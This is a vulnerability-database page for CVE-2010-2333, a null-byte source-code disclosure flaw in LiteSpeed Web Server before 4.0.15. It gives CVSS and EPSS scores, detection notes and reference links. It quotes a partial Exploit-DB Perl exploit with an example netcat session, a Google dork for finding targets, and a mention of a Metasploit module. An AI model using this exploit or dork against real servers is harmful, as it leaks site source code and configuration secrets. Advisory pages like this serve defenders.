CVE-2010-2333
published 2010-06-18CVE-2010-2333: LiteSpeed Technologies LiteSpeed Web Server 4.0.x before 4.0.15 allows remote attackers to read the source code of scripts via an HTTP request with a null byte…
PriorityP350medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
60.20%
99.0th percentile
LiteSpeed Technologies LiteSpeed Web Server 4.0.x before 4.0.15 allows remote attackers to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
| litespeedtech | litespeed_web_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Flag HTTP responses from servers identifying as 'LiteSpeed' where the request URI contains a null byte — the exploit checks for 'LiteSpeed' in the response to confirm target validity ↗
- →Use the Google dork 'Proudly Served by LiteSpeed Web Server' to identify exposed LiteSpeed instances potentially vulnerable to this CVE ↗
- →Metasploit auxiliary module targets LiteSpeed versions 4.0.14 and prior for source code disclosure scanning ↗
- →The vulnerability allows reading script source code (e.g., PHP files) via a null-byte-poisoned URI; monitor for unexpected .txt-suffixed requests to known script paths ↗
- ·Vulnerability is version-scoped: only LiteSpeed Web Server 4.0.x before 4.0.15 is affected; version 4.0.15 and later are not vulnerable ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Litespeed Technologies - Web Server Remote Poison Null Byte
exploitdb·2010-06-13
CVE-2010-2333 Litespeed Technologies - Web Server Remote Poison Null Byte
Litespeed Technologies - Web Server Remote Poison Null Byte
---
Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
google gives me over 9million hits
Example exploit session:
%nc 192.168.2.19 80
HEAD / HTTP/1.0
HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed .
%cat 192.168.2.19-config.php
%
Exploit:
#!/usr/bin/perl
#
#LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit
#By Kingcope
#Google search: ""Proudly Served by LiteSpeed Web Server""
#June 2010
#Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556
#
use IO::Socket;
use strict;
sub getphpsrc {
my $host = shift;
my $file = shift;
if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
Metasploit
LiteSpeed Source Code Disclosure/Download
metasploit
LiteSpeed Source Code Disclosure/Download
LiteSpeed Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed.
No writeups or analysis indexed.
http://osvdb.org/65476http://seclists.org/fulldisclosure/2010/Jun/288http://secunia.com/advisories/40128http://www.exploit-db.com/exploits/13850http://www.litespeedtech.com/latest/litespeed-web-server-4.0.15-released.htmlhttp://www.litespeedtech.com/support/forum/showthread.php?t=4078http://www.securityfocus.com/bid/40815http://osvdb.org/65476http://seclists.org/fulldisclosure/2010/Jun/288http://secunia.com/advisories/40128http://www.exploit-db.com/exploits/13850http://www.litespeedtech.com/latest/litespeed-web-server-4.0.15-released.htmlhttp://www.litespeedtech.com/support/forum/showthread.php?t=4078http://www.securityfocus.com/bid/40815
2010-06-18
Published